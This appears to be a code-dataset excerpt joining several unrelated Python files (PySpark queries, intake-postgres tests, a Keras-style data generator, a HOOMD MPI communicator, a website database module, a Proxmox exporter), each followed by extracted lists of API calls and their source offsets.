SELECT DEST_COUNTRY_NAME, sum(count) as destination_total
FROM flight_data_2015
GROUP BY DEST_COUNTRY_NAME
ORDER BY sum(count) DESC
LIMIT 5
""")
maxSql.show()
# COMMAND ----------
from pyspark.sql.functions import desc
flightData2015\
.groupBy("DEST_COUNTRY_NAME")\
.sum("count")\
.withColumnRenamed("sum(count)", "destination_total")\
.sort(desc("destination_total"))\
.limit(5)\
.show()
# COMMAND ----------
flightData2015\
.groupBy("DEST_COUNTRY_NAME")\
.sum("count")\
.withColumnRenamed("sum(count)", "destination_total")\
.sort(desc("destination_total"))\
.limit(5)\
.explain()
# COMMAND ----------
| [
"pyspark.sql.functions.col",
"pyspark.sql.SparkSession.builder.getOrCreate",
"pyspark.sql.functions.desc"
]
| [((111, 145), 'pyspark.sql.SparkSession.builder.getOrCreate', 'SparkSession.builder.getOrCreate', ([], {}), '()\n', (143, 145), False, 'from pyspark.sql import SparkSession\n'), ((876, 888), 'pyspark.sql.functions.col', 'col', (['"""count"""'], {}), "('count')\n", (879, 888), False, 'from pyspark.sql.functions import max, col\n'), ((1301, 1326), 'pyspark.sql.functions.desc', 'desc', (['"""destination_total"""'], {}), "('destination_total')\n", (1305, 1326), False, 'from pyspark.sql.functions import desc\n'), ((1507, 1532), 'pyspark.sql.functions.desc', 'desc', (['"""destination_total"""'], {}), "('destination_total')\n", (1511, 1532), False, 'from pyspark.sql.functions import desc\n')] |
import os
import pickle
import pytest
import pandas as pd
from shapely import wkt
from intake_postgres import PostgresSource
from intake import open_catalog
from .util import verify_datasource_interface
TEST_DATA_DIR = 'tests'
TEST_DATA = [
('sample1', 'sample1.csv'),
('sample2_1', 'sample2_1.csv'),
('sample2_2', 'sample2_2.csv'),
]
TEST_GIS_DATA = [
('points', 'sample_points.psql'),
('multipoints', 'sample_multipoints.psql'),
('lines', 'sample_lines.psql'),
('multilines', 'sample_multilines.psql'),
('polygons', 'sample_polygons.psql'),
('multipolygons', 'sample_multipolygons.psql'),
# ('triangles', 'sample_triangles.psql'),
]
TEST_TEMPLATE_DATA = [
'jinja2_params_with_env',
]
@pytest.fixture(scope='module')
def engine():
"""Start docker container for PostgreSQL database, yield a tuple (engine,
metadata), and cleanup connection afterward."""
from .util import start_postgres, stop_postgres
from sqlalchemy import create_engine
stop_postgres(let_fail=True)
local_port = start_postgres()
uri = 'postgresql://postgres@localhost:{}/postgres'.format(local_port)
engine = create_engine(uri)
for table_name, csv_fname in TEST_DATA:
csv_fpath = os.path.join(TEST_DATA_DIR, csv_fname)
df = pd.read_csv(csv_fpath)
df.to_sql(table_name, engine, index=False)
for table_name, psql_fname in TEST_GIS_DATA:
psql_fpath = os.path.join(TEST_DATA_DIR, psql_fname)
with engine.connect() as conn:
with open(psql_fpath, 'r') as fp:
cmds = fp.read().strip().split(';')
for cmd in cmds:
if cmd.strip():
conn.execute(' '.join(cmd.split()))
try:
yield engine
finally:
stop_postgres()
@pytest.mark.parametrize('table_name,_', TEST_DATA)
def test_open(engine, table_name, _):
d = PostgresSource(str(engine.url), 'select * from '+table_name)
assert d.container == 'dataframe'
assert d.description is None
verify_datasource_interface(d)
@pytest.mark.parametrize('table_name,csv_fpath', TEST_DATA)
def test_discover(engine, table_name, csv_fpath):
expected_df = pd.read_csv(os.path.join(TEST_DATA_DIR, csv_fpath))
source = PostgresSource(str(engine.url), 'select * from '+table_name)
info = source.discover()
dt = {k: str(v) for k, v in expected_df.dtypes.to_dict().items()}
assert info['dtype'] == dt
assert info['shape'] == (None, 3)
assert info['npartitions'] == 1
@pytest.mark.parametrize('table_name,csv_fpath', TEST_DATA)
def test_read(engine, table_name, csv_fpath):
expected_df = pd.read_csv(os.path.join(TEST_DATA_DIR, csv_fpath))
source = PostgresSource(str(engine.url), 'select * from '+table_name)
df = source.read()
assert expected_df.equals(df)
@pytest.mark.parametrize('table_name,csv_fpath', TEST_DATA)
def test_discover_after_read(engine, table_name, csv_fpath):
"""Assert that after reading the dataframe, discover() shows more accurate
information.
"""
expected_df = pd.read_csv(os.path.join(TEST_DATA_DIR, csv_fpath))
source = PostgresSource(str(engine.url), 'select * from '+table_name)
info = source.discover()
dt = {k: str(v) for k, v in expected_df.dtypes.to_dict().items()}
assert info['dtype'] == dt
assert info['shape'] == (None, 3)
assert info['npartitions'] == 1
df = source.read()
assert expected_df.equals(df)
info = source.discover()
assert info['dtype'] == dt
assert info['shape'] == (4, 3)
assert info['npartitions'] == 1
assert expected_df.equals(df)
@pytest.mark.parametrize('table_name,csv_fpath', TEST_DATA)
def test_close(engine, table_name, csv_fpath):
expected_df = pd.read_csv(os.path.join(TEST_DATA_DIR, csv_fpath))
source = PostgresSource(str(engine.url), 'select * from '+table_name)
source.close()
# Can reopen after close
df = source.read()
assert expected_df.equals(df)
@pytest.mark.parametrize('table_name,csv_fpath', TEST_DATA)
def test_pickle(engine, table_name, csv_fpath):
source = PostgresSource(str(engine.url), 'select * from '+table_name)
pickled_source = pickle.dumps(source)
source_clone = pickle.loads(pickled_source)
expected_df = source.read()
df = source_clone.read()
assert expected_df.equals(df)
@pytest.mark.parametrize('table_name,_1', TEST_DATA)
def test_catalog(engine, table_name, _1):
catalog_fpath = os.path.join(TEST_DATA_DIR, 'catalog1.yml')
catalog = open_catalog(catalog_fpath)
ds_name = table_name.rsplit('_idx', 1)[0]
src = catalog[ds_name]
pgsrc = src.get()
pgsrc._uri = str(engine.url)
assert src.describe()['container'] == 'dataframe'
assert src.describe_open()['plugin'] == 'postgres'
assert src.describe_open()['args']['sql_expr'][:6] in ('select', 'SELECT')
metadata = pgsrc.discover()
assert metadata['npartitions'] == 1
expected_df = pd.read_sql_query(pgsrc._sql_expr, engine)
df = pgsrc.read()
assert expected_df.equals(df)
pgsrc.close()
def test_catalog_join(engine):
catalog_fpath = os.path.join(TEST_DATA_DIR, 'catalog1.yml')
catalog = open_catalog(catalog_fpath)
ds_name = 'sample2'
src = catalog[ds_name]
pgsrc = src.get()
pgsrc._uri = str(engine.url)
assert src.describe()['container'] == 'dataframe'
assert src.describe_open()['plugin'] == 'postgres'
assert src.describe_open()['args']['sql_expr'][:6] in ('select', 'SELECT')
metadata = pgsrc.discover()
assert metadata['npartitions'] == 1
expected_df = pd.read_sql_query(pgsrc._sql_expr, engine)
df = pgsrc.read()
assert expected_df.equals(df)
pgsrc.close()
@pytest.mark.parametrize('table_name,_1', TEST_GIS_DATA)
def test_postgis_data(engine, table_name, _1):
from sqlalchemy import MetaData
catalog_fpath = os.path.join(TEST_DATA_DIR, 'catalog1.yml')
catalog = open_catalog(catalog_fpath)
ds_name = table_name
src = catalog[ds_name]
pgsrc = src.get()
pgsrc._uri = str(engine.url)
assert src.describe()['container'] == 'dataframe'
assert src.describe_open()['plugin'] == 'postgres'
assert src.describe_open()['args']['sql_expr'][:6] in ('select', 'SELECT')
metadata = pgsrc.discover()
assert metadata['npartitions'] == 1
meta = MetaData()
meta.reflect(bind=engine)
col_exprs = ['ST_AsText({0}) as {0}'.format(col.name)
for col in meta.tables[table_name].columns]
_query = pgsrc._sql_expr.replace('*', ', '.join(col_exprs))
expected_df = pd.read_sql_query(_query, engine).applymap(
lambda geom: str(wkt.loads(geom))
)
df = pgsrc.read().applymap(lambda geom: str(wkt.loads(geom)))
assert expected_df.equals(df)
pgsrc.close()
@pytest.mark.parametrize('ds_name', TEST_TEMPLATE_DATA)
def test_jinja2(engine, ds_name):
catalog_fpath = os.path.join(TEST_DATA_DIR, 'catalog1.yml')
catalog = open_catalog(catalog_fpath)
src = catalog[ds_name]
pgsrc = src.get()
pgsrc._uri = str(engine.url)
assert src.describe()['container'] == 'dataframe'
assert src.describe_open()['plugin'] == 'postgres'
assert src.describe_open()['args']['sql_expr'][:6] in ('select', 'SELECT')
metadata = pgsrc.discover()
assert metadata['npartitions'] == 1
expected_df = pd.read_sql_query(pgsrc._sql_expr, engine)
df = pgsrc.read()
assert expected_df.equals(df)
pgsrc.close()
| [
"pandas.read_sql_query",
"intake.open_catalog",
"pandas.read_csv",
"pickle.dumps",
"pickle.loads",
"sqlalchemy.create_engine",
"shapely.wkt.loads",
"os.path.join",
"pytest.mark.parametrize",
"sqlalchemy.MetaData",
"pytest.fixture"
]
| [((736, 766), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (750, 766), False, 'import pytest\n'), ((1804, 1854), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""table_name,_"""', 'TEST_DATA'], {}), "('table_name,_', TEST_DATA)\n", (1827, 1854), False, 'import pytest\n'), ((2071, 2129), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""table_name,csv_fpath"""', 'TEST_DATA'], {}), "('table_name,csv_fpath', TEST_DATA)\n", (2094, 2129), False, 'import pytest\n'), ((2531, 2589), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""table_name,csv_fpath"""', 'TEST_DATA'], {}), "('table_name,csv_fpath', TEST_DATA)\n", (2554, 2589), False, 'import pytest\n'), ((2840, 2898), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""table_name,csv_fpath"""', 'TEST_DATA'], {}), "('table_name,csv_fpath', TEST_DATA)\n", (2863, 2898), False, 'import pytest\n'), ((3640, 3698), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""table_name,csv_fpath"""', 'TEST_DATA'], {}), "('table_name,csv_fpath', TEST_DATA)\n", (3663, 3698), False, 'import pytest\n'), ((4000, 4058), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""table_name,csv_fpath"""', 'TEST_DATA'], {}), "('table_name,csv_fpath', TEST_DATA)\n", (4023, 4058), False, 'import pytest\n'), ((4372, 4423), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""table_name,_1"""', 'TEST_DATA'], {}), "('table_name,_1', TEST_DATA)\n", (4395, 4423), False, 'import pytest\n'), ((5748, 5803), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""table_name,_1"""', 'TEST_GIS_DATA'], {}), "('table_name,_1', TEST_GIS_DATA)\n", (5771, 5803), False, 'import pytest\n'), ((6831, 6885), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""ds_name"""', 'TEST_TEMPLATE_DATA'], {}), "('ds_name', TEST_TEMPLATE_DATA)\n", (6854, 6885), False, 'import pytest\n'), ((1160, 1178), 'sqlalchemy.create_engine', 'create_engine', (['uri'], {}), '(uri)\n', (1173, 1178), False, 'from sqlalchemy import create_engine\n'), ((4203, 4223), 'pickle.dumps', 'pickle.dumps', (['source'], {}), '(source)\n', (4215, 4223), False, 'import pickle\n'), ((4243, 4271), 'pickle.loads', 'pickle.loads', (['pickled_source'], {}), '(pickled_source)\n', (4255, 4271), False, 'import pickle\n'), ((4486, 4529), 'os.path.join', 'os.path.join', (['TEST_DATA_DIR', '"""catalog1.yml"""'], {}), "(TEST_DATA_DIR, 'catalog1.yml')\n", (4498, 4529), False, 'import os\n'), ((4545, 4572), 'intake.open_catalog', 'open_catalog', (['catalog_fpath'], {}), '(catalog_fpath)\n', (4557, 4572), False, 'from intake import open_catalog\n'), ((4982, 5024), 'pandas.read_sql_query', 'pd.read_sql_query', (['pgsrc._sql_expr', 'engine'], {}), '(pgsrc._sql_expr, engine)\n', (4999, 5024), True, 'import pandas as pd\n'), ((5153, 5196), 'os.path.join', 'os.path.join', (['TEST_DATA_DIR', '"""catalog1.yml"""'], {}), "(TEST_DATA_DIR, 'catalog1.yml')\n", (5165, 5196), False, 'import os\n'), ((5212, 5239), 'intake.open_catalog', 'open_catalog', (['catalog_fpath'], {}), '(catalog_fpath)\n', (5224, 5239), False, 'from intake import open_catalog\n'), ((5627, 5669), 'pandas.read_sql_query', 'pd.read_sql_query', (['pgsrc._sql_expr', 'engine'], {}), '(pgsrc._sql_expr, engine)\n', (5644, 5669), True, 'import pandas as pd\n'), ((5907, 5950), 'os.path.join', 'os.path.join', (['TEST_DATA_DIR', '"""catalog1.yml"""'], {}), "(TEST_DATA_DIR, 'catalog1.yml')\n", (5919, 5950), False, 'import os\n'), ((5966, 5993), 'intake.open_catalog', 'open_catalog', (['catalog_fpath'], {}), '(catalog_fpath)\n', (5978, 5993), False, 'from intake import open_catalog\n'), ((6375, 6385), 'sqlalchemy.MetaData', 'MetaData', ([], {}), '()\n', (6383, 6385), False, 'from sqlalchemy import MetaData\n'), ((6940, 6983), 'os.path.join', 'os.path.join', (['TEST_DATA_DIR', '"""catalog1.yml"""'], {}), "(TEST_DATA_DIR, 'catalog1.yml')\n", (6952, 6983), False, 'import os\n'), ((6999, 7026), 'intake.open_catalog', 'open_catalog', (['catalog_fpath'], {}), '(catalog_fpath)\n', (7011, 7026), False, 'from intake import open_catalog\n'), ((7390, 7432), 'pandas.read_sql_query', 'pd.read_sql_query', (['pgsrc._sql_expr', 'engine'], {}), '(pgsrc._sql_expr, engine)\n', (7407, 7432), True, 'import pandas as pd\n'), ((1243, 1281), 'os.path.join', 'os.path.join', (['TEST_DATA_DIR', 'csv_fname'], {}), '(TEST_DATA_DIR, csv_fname)\n', (1255, 1281), False, 'import os\n'), ((1295, 1317), 'pandas.read_csv', 'pd.read_csv', (['csv_fpath'], {}), '(csv_fpath)\n', (1306, 1317), True, 'import pandas as pd\n'), ((1439, 1478), 'os.path.join', 'os.path.join', (['TEST_DATA_DIR', 'psql_fname'], {}), '(TEST_DATA_DIR, psql_fname)\n', (1451, 1478), False, 'import os\n'), ((2210, 2248), 'os.path.join', 'os.path.join', (['TEST_DATA_DIR', 'csv_fpath'], {}), '(TEST_DATA_DIR, csv_fpath)\n', (2222, 2248), False, 'import os\n'), ((2666, 2704), 'os.path.join', 'os.path.join', (['TEST_DATA_DIR', 'csv_fpath'], {}), '(TEST_DATA_DIR, csv_fpath)\n', (2678, 2704), False, 'import os\n'), ((3094, 3132), 'os.path.join', 'os.path.join', (['TEST_DATA_DIR', 'csv_fpath'], {}), '(TEST_DATA_DIR, csv_fpath)\n', (3106, 3132), False, 'import os\n'), ((3776, 3814), 'os.path.join', 'os.path.join', (['TEST_DATA_DIR', 'csv_fpath'], {}), '(TEST_DATA_DIR, csv_fpath)\n', (3788, 3814), False, 'import os\n'), ((6617, 6650), 'pandas.read_sql_query', 'pd.read_sql_query', (['_query', 'engine'], {}), '(_query, engine)\n', (6634, 6650), True, 'import pandas as pd\n'), ((6686, 6701), 'shapely.wkt.loads', 'wkt.loads', (['geom'], {}), '(geom)\n', (6695, 6701), False, 'from shapely import wkt\n'), ((6757, 6772), 'shapely.wkt.loads', 'wkt.loads', (['geom'], {}), '(geom)\n', (6766, 6772), False, 'from shapely import wkt\n')] |
import numpy as np
class DataGenerator:
def __init__(self, inputs, shuffle=True, batch_size=32):
assert len(inputs) > 0
self.inputs = inputs
self.idx = np.arange(len(inputs[0]))
self.shuffle = shuffle
self.batch_size = batch_size
self.on_epoch_end()
def data_length(self):
return len(self.idx)
def __len__(self):
n = self.data_length()
len_ = n // self.batch_size
return len_ if n % self.batch_size == 0 else len_ + 1
def __getitem__(self, index):
start = index * self.batch_size
end = start + self.batch_size
index = self.idx[start:end]
data = []
for x in self.inputs:
data.append(x[index])
return data
def on_epoch_end(self):
if self.shuffle:
np.random.shuffle(self.idx)
def set_batch_size(self, batch_size):
self.batch_size = batch_size
def lr_decay(total_epoch, init_lr, split_val):
lr_map = [init_lr] * total_epoch
if len(split_val) > 0:
assert split_val[0][0] > 1
assert split_val[-1][0] <= total_epoch
current_split_index = 0
current_lr = init_lr
next_epoch, next_lr = split_val[current_split_index]
for i in range(total_epoch):
if i < next_epoch - 1:
lr_map[i] = current_lr
else:
current_lr = next_lr
lr_map[i] = current_lr
current_split_index += 1
if current_split_index >= len(split_val):
next_epoch = total_epoch + 1
else:
next_epoch, next_lr = split_val[current_split_index]
def lr_schedule_fn(epoch, lr):
return lr_map[epoch]
return lr_schedule_fn
| [
"numpy.random.shuffle"
]
| [((831, 858), 'numpy.random.shuffle', 'np.random.shuffle', (['self.idx'], {}), '(self.idx)\n', (848, 858), True, 'import numpy as np\n')] |
from nltk.tokenize import sent_tokenize, word_tokenize
from nltk.corpus import stopwords
import speech_recognition as sr
import nltk
from google_images_download import google_images_download
response = google_images_download.googleimagesdownload()
r = sr.Recognizer()
with sr.Microphone() as source:
print("Say something!")
audio = r.listen(source)
data = r.recognize_google(audio).encode("utf-8")
print (data)
stopWords = set(stopwords.words('english'))
words = word_tokenize(data)
wordsFiltered = []
for w in words:
if w not in stopWords:
wordsFiltered.append(w)
into_string = str(wordsFiltered)
print(into_string)
arguments = {"keywords":into_string,"limit":2,"print_urls":True} #creating list of arguments
response.download(arguments) #passing the arguments to the function | [
"nltk.corpus.stopwords.words",
"google_images_download.google_images_download.googleimagesdownload",
"nltk.tokenize.word_tokenize",
"speech_recognition.Recognizer",
"speech_recognition.Microphone"
]
| [((203, 248), 'google_images_download.google_images_download.googleimagesdownload', 'google_images_download.googleimagesdownload', ([], {}), '()\n', (246, 248), False, 'from google_images_download import google_images_download\n'), ((253, 268), 'speech_recognition.Recognizer', 'sr.Recognizer', ([], {}), '()\n', (266, 268), True, 'import speech_recognition as sr\n'), ((477, 496), 'nltk.tokenize.word_tokenize', 'word_tokenize', (['data'], {}), '(data)\n', (490, 496), False, 'from nltk.tokenize import sent_tokenize, word_tokenize\n'), ((274, 289), 'speech_recognition.Microphone', 'sr.Microphone', ([], {}), '()\n', (287, 289), True, 'import speech_recognition as sr\n'), ((441, 467), 'nltk.corpus.stopwords.words', 'stopwords.words', (['"""english"""'], {}), "('english')\n", (456, 467), False, 'from nltk.corpus import stopwords\n')] |
# Copyright (c) 2009-2021 The Regents of the University of Michigan
# This file is part of the HOOMD-blue project, released under the BSD 3-Clause
# License.
"""MPI communicator."""
from hoomd import _hoomd
import hoomd
import contextlib
class Communicator(object):
"""MPI communicator.
Args:
mpi_comm: Accepts an mpi4py communicator. Use this argument to perform
many independent hoomd simulations where you communicate between those
simulations using mpi4py.
ranks_per_partition (int): (MPI) Number of ranks to include in a
partition.
`Communicator` initialize MPI communications for a `hoomd.Simulation`. To
use MPI, launch your Python script with an MPI launcher (e.g. ``mpirun`` or
``mpiexec``). By default, `Communicator` uses all ranks provided by the
launcher ``num_launch_ranks`` for a single `hoomd.Simulation` object which
decomposes the state onto that many domains.
Set ``ranks_per_partition`` to an integer to partition launched ranks into
``num_launch_ranks / ranks_per_partition`` communicators, each with their
own `partition` index. Use this to perform many simulations in parallel, for
example by using `partition` as an index into an array of state points to
execute.
"""
def __init__(self, mpi_comm=None, ranks_per_partition=None):
# check ranks_per_partition
if ranks_per_partition is not None:
if not hoomd.version.mpi_enabled:
raise RuntimeError(
"The ranks_per_partition option is only available in MPI.\n"
)
mpi_available = hoomd.version.mpi_enabled
self.cpp_mpi_conf = None
# create the specified configuration
if mpi_comm is None:
self.cpp_mpi_conf = _hoomd.MPIConfiguration()
else:
if not mpi_available:
raise RuntimeError("mpi_comm is not supported in serial builds")
handled = False
# pass in pointer to MPI_Comm object provided by mpi4py
try:
import mpi4py
if isinstance(mpi_comm, mpi4py.MPI.Comm):
addr = mpi4py.MPI._addressof(mpi_comm)
self.cpp_mpi_conf = \
_hoomd.MPIConfiguration._make_mpi_conf_mpi_comm(addr)
handled = True
except ImportError:
# silently ignore when mpi4py is missing
pass
# undocumented case: handle plain integers as pointers to MPI_Comm
# objects
if not handled and isinstance(mpi_comm, int):
self.cpp_mpi_conf = \
_hoomd.MPIConfiguration._make_mpi_conf_mpi_comm(mpi_comm)
handled = True
if not handled:
raise RuntimeError(
"Invalid mpi_comm object: {}".format(mpi_comm))
if ranks_per_partition is not None:
# check validity
if (self.cpp_mpi_conf.getNRanksGlobal() % ranks_per_partition):
raise RuntimeError('Total number of ranks is not a multiple of '
'ranks_per_partition.')
# split the communicator into partitions
self.cpp_mpi_conf.splitPartitions(ranks_per_partition)
@property
def num_ranks(self):
"""int: The number of ranks in this partition.
When initialized with ``ranks_per_partition=None``, `num_ranks` is equal
to the ``num_launch_ranks`` set by the MPI launcher. When using
partitions, `num_ranks` is equal to ``ranks_per_partition``.
Note:
Returns 1 in builds with ENABLE_MPI=off.
"""
if hoomd.version.mpi_enabled:
return self.cpp_mpi_conf.getNRanks()
else:
return 1
@property
def rank(self):
"""int: The current rank within the partition.
Note:
Returns 0 in builds with ENABLE_MPI=off.
"""
if hoomd.version.mpi_enabled:
return self.cpp_mpi_conf.getRank()
else:
return 0
@property
def num_partitions(self):
"""int: The number of partitions in this execution.
Create partitions with the ``ranks_per_partition`` argument on
initialization. Then, the number of partitions is
``num_launch_ranks / ranks_per_partition``.
Note:
Returns 1 in builds with ENABLE_MPI=off.
"""
if hoomd.version.mpi_enabled:
return self.cpp_mpi_conf.getNPartitions()
else:
return 1
@property
def partition(self):
"""int: The current partition.
Note:
Returns 0 in builds with ENABLE_MPI=off.
"""
if hoomd.version.mpi_enabled:
return self.cpp_mpi_conf.getPartition()
else:
return 0
def barrier_all(self):
"""Perform a MPI barrier synchronization across all ranks.
Note:
Does nothing in builds with ENABLE_MPI=off.
"""
if hoomd.version.mpi_enabled:
_hoomd.mpi_barrier_world()
def barrier(self):
"""Perform a barrier synchronization across all ranks in the partition.
Note:
Does nothing in builds with ENABLE_MPI=off.
"""
if hoomd.version.mpi_enabled:
self.cpp_mpi_conf.barrier()
@contextlib.contextmanager
def localize_abort(self):
"""Localize MPI_Abort to this partition.
HOOMD calls ``MPI_Abort`` to tear down all running MPI processes
whenever there is an uncaught exception. By default, this will abort the
entire MPI execution. When using partitions, an uncaught exception on
one partition will therefore abort all of them.
Use the return value of :py:meth:`localize_abort()` as a context manager
to tell HOOMD that all operations within the context will use only
that MPI communicator so that an uncaught exception in one partition
will only abort that partition and leave the others running.
"""
global _current_communicator
prev = _current_communicator
_current_communicator = self
yield None
_current_communicator = prev
# store the "current" communicator to be used for MPI_Abort calls. This defaults
# to the world communicator, but users can opt in to a more specific
# communicator using the Device.localize_abort context manager
_current_communicator = Communicator()
| [
"hoomd._hoomd.MPIConfiguration",
"hoomd._hoomd.MPIConfiguration._make_mpi_conf_mpi_comm",
"hoomd._hoomd.mpi_barrier_world",
"mpi4py.MPI._addressof"
]
| [((1818, 1843), 'hoomd._hoomd.MPIConfiguration', '_hoomd.MPIConfiguration', ([], {}), '()\n', (1841, 1843), False, 'from hoomd import _hoomd\n'), ((5167, 5193), 'hoomd._hoomd.mpi_barrier_world', '_hoomd.mpi_barrier_world', ([], {}), '()\n', (5191, 5193), False, 'from hoomd import _hoomd\n'), ((2718, 2775), 'hoomd._hoomd.MPIConfiguration._make_mpi_conf_mpi_comm', '_hoomd.MPIConfiguration._make_mpi_conf_mpi_comm', (['mpi_comm'], {}), '(mpi_comm)\n', (2765, 2775), False, 'from hoomd import _hoomd\n'), ((2203, 2234), 'mpi4py.MPI._addressof', 'mpi4py.MPI._addressof', (['mpi_comm'], {}), '(mpi_comm)\n', (2224, 2234), False, 'import mpi4py\n'), ((2301, 2354), 'hoomd._hoomd.MPIConfiguration._make_mpi_conf_mpi_comm', '_hoomd.MPIConfiguration._make_mpi_conf_mpi_comm', (['addr'], {}), '(addr)\n', (2348, 2354), False, 'from hoomd import _hoomd\n')] |
import _ast
from peon.src.project.file.function_def.function import FunctionLint
class ReflectionAtLineFixture:
empty_node = _ast.Pass
is_instance_at_first_lvl = _ast.FunctionDef(id='isinstance', lineno=1)
type_at_first_lvl = _ast.FunctionDef(id='type', lineno=1)
is_instance_at_second_lvl = _ast.FunctionDef(body=[_ast.Expr(id='isinstance', lineno=2)], lineno=1)
type_at_second_lvl = _ast.FunctionDef(body=[_ast.Expr(id='type', lineno=2)], lineno=1)
def test_empty_node():
assert FunctionLint(
definition=ReflectionAtLineFixture.empty_node,
).reflection_at_line() == tuple()
def test_is_instance_at_first_lvl():
assert FunctionLint(
definition=ReflectionAtLineFixture.is_instance_at_first_lvl,
).reflection_at_line() == (1,)
def test_type_at_first_lvl():
assert FunctionLint(
definition=ReflectionAtLineFixture.type_at_first_lvl,
).reflection_at_line() == (1,)
def test_is_instance_at_second_lvl():
assert FunctionLint(
definition=ReflectionAtLineFixture.is_instance_at_second_lvl,
).reflection_at_line() == (2,)
def test_type_at_second_lvl():
assert FunctionLint(
definition=ReflectionAtLineFixture.type_at_second_lvl,
).reflection_at_line() == (2,)
| [
"_ast.Expr",
"_ast.FunctionDef",
"peon.src.project.file.function_def.function.FunctionLint"
]
| [((173, 216), '_ast.FunctionDef', '_ast.FunctionDef', ([], {'id': '"""isinstance"""', 'lineno': '(1)'}), "(id='isinstance', lineno=1)\n", (189, 216), False, 'import _ast\n'), ((241, 278), '_ast.FunctionDef', '_ast.FunctionDef', ([], {'id': '"""type"""', 'lineno': '(1)'}), "(id='type', lineno=1)\n", (257, 278), False, 'import _ast\n'), ((334, 370), '_ast.Expr', '_ast.Expr', ([], {'id': '"""isinstance"""', 'lineno': '(2)'}), "(id='isinstance', lineno=2)\n", (343, 370), False, 'import _ast\n'), ((431, 461), '_ast.Expr', '_ast.Expr', ([], {'id': '"""type"""', 'lineno': '(2)'}), "(id='type', lineno=2)\n", (440, 461), False, 'import _ast\n'), ((510, 569), 'peon.src.project.file.function_def.function.FunctionLint', 'FunctionLint', ([], {'definition': 'ReflectionAtLineFixture.empty_node'}), '(definition=ReflectionAtLineFixture.empty_node)\n', (522, 569), False, 'from peon.src.project.file.function_def.function import FunctionLint\n'), ((667, 740), 'peon.src.project.file.function_def.function.FunctionLint', 'FunctionLint', ([], {'definition': 'ReflectionAtLineFixture.is_instance_at_first_lvl'}), '(definition=ReflectionAtLineFixture.is_instance_at_first_lvl)\n', (679, 740), False, 'from peon.src.project.file.function_def.function import FunctionLint\n'), ((828, 894), 'peon.src.project.file.function_def.function.FunctionLint', 'FunctionLint', ([], {'definition': 'ReflectionAtLineFixture.type_at_first_lvl'}), '(definition=ReflectionAtLineFixture.type_at_first_lvl)\n', (840, 894), False, 'from peon.src.project.file.function_def.function import FunctionLint\n'), ((990, 1064), 'peon.src.project.file.function_def.function.FunctionLint', 'FunctionLint', ([], {'definition': 'ReflectionAtLineFixture.is_instance_at_second_lvl'}), '(definition=ReflectionAtLineFixture.is_instance_at_second_lvl)\n', (1002, 1064), False, 'from peon.src.project.file.function_def.function import FunctionLint\n'), ((1153, 1220), 'peon.src.project.file.function_def.function.FunctionLint', 'FunctionLint', ([], {'definition': 'ReflectionAtLineFixture.type_at_second_lvl'}), '(definition=ReflectionAtLineFixture.type_at_second_lvl)\n', (1165, 1220), False, 'from peon.src.project.file.function_def.function import FunctionLint\n')] |
###############################################################################
# #
'''Website Database-connection-related features''' #
# #
###############################################################################
import cymysql
from conf import website_db
from time import gmtime
from time import strftime
db_host = website_db.ip
db_port = website_db.port
db = website_db.db
db_user = website_db.user
db_pw = website_db.pw
###############################################################################
# #
'''Databse-connect and close''' #
# #
###############################################################################
def db_con():
conn = cymysql.connect(host=db_host, port=db_port, user=db_user, passwd=db_pw, db=db)
cur = conn.cursor()
return conn, cur
def db_close(conn, cur):
cur.close()
conn.close()
###############################################################################
# #
'''Donation-Page data''' #
# #
###############################################################################
def donate_save(nick):
conn, cur = db_con()
time = strftime('%Y.%m.%d - %H:%M:%S', gmtime())
cur.execute('INSERT INTO `donate` (`time`, `user`) VALUES (%s, %s)', (time, nick))
conn.commit()
db_close(conn, cur)
def donate_read():
conn, cur = db_con()
cur.execute('SELECT * FROM `donate` ORDER BY `time` DESC LIMIT 20')
nicks = list()
for r in cur.fetchall():
nicks.append([r[0], r[1]])
db_close(conn, cur)
return nicks
###############################################################################
# #
'''Short-URL data''' #
# #
###############################################################################
def shorturl_save(surl, url):
conn, cur = db_con()
cur.execute('INSERT INTO `shorturls` (`surl`, `url`) VALUES (%s, %s)', (surl, url))
conn.commit()
db_close(conn, cur)
def shorturl_read():
conn, cur = db_con()
cur.execute('SELECT * FROM `shorturls`')
urls = list()
for r in cur.fetchall():
urls.append([r[0], r[0], r[1]])
db_close(conn, cur)
return urls
###############################################################################
# #
'''Old Worlds''' #
# #
###############################################################################
def get_old_worlds(item):
conn, cur = db_con()
sql = 'SELECT * FROM `oldworlds` ORDER BY `date` DESC LIMIT {0}, {1}'.format(item, 20)
cur.execute(sql)
worlds = cur.fetchall()
db_close(conn, cur)
return worlds
###############################################################################
# #
'''Server Backup-Size in Dash''' #
# #
###############################################################################
def backup_size():
conn, cur = db_con()
dbtshock = []
tserver = []
htdocs = []
cur.execute('SELECT * FROM `backups`')
for r in cur.fetchall():
if r[1] == 'db':
dbtshock.append([r[0] * 1000, r[2]])
elif r[1] == 'tserver':
tserver.append([r[0] * 1000, r[2]])
elif r[1] == 'htdocs':
htdocs.append([r[0] * 1000, r[2]])
db_close(conn, cur)
return (dbtshock, tserver, htdocs)
| [
"cymysql.connect",
"time.gmtime"
]
| [((1043, 1121), 'cymysql.connect', 'cymysql.connect', ([], {'host': 'db_host', 'port': 'db_port', 'user': 'db_user', 'passwd': 'db_pw', 'db': 'db'}), '(host=db_host, port=db_port, user=db_user, passwd=db_pw, db=db)\n', (1058, 1121), False, 'import cymysql\n'), ((1722, 1730), 'time.gmtime', 'gmtime', ([], {}), '()\n', (1728, 1730), False, 'from time import gmtime\n')] |
"""
Proxmox VE exporter for the Prometheus monitoring system.
"""
import sys
from argparse import ArgumentParser
from pve_exporter.http import start_http_server
def main(args=None):
"""
Main entry point.
"""
parser = ArgumentParser()
parser.add_argument('config', nargs='?', default='pve.yml',
help='Path to configuration file (pve.yml)')
parser.add_argument('port', nargs='?', type=int, default='9221',
help='Port on which the exporter is listening (9221)')
parser.add_argument('address', nargs='?', default='',
help='Address to which the exporter will bind')
params = parser.parse_args(args if args is None else sys.argv[1:])
start_http_server(params.config, params.port, params.address)
| [
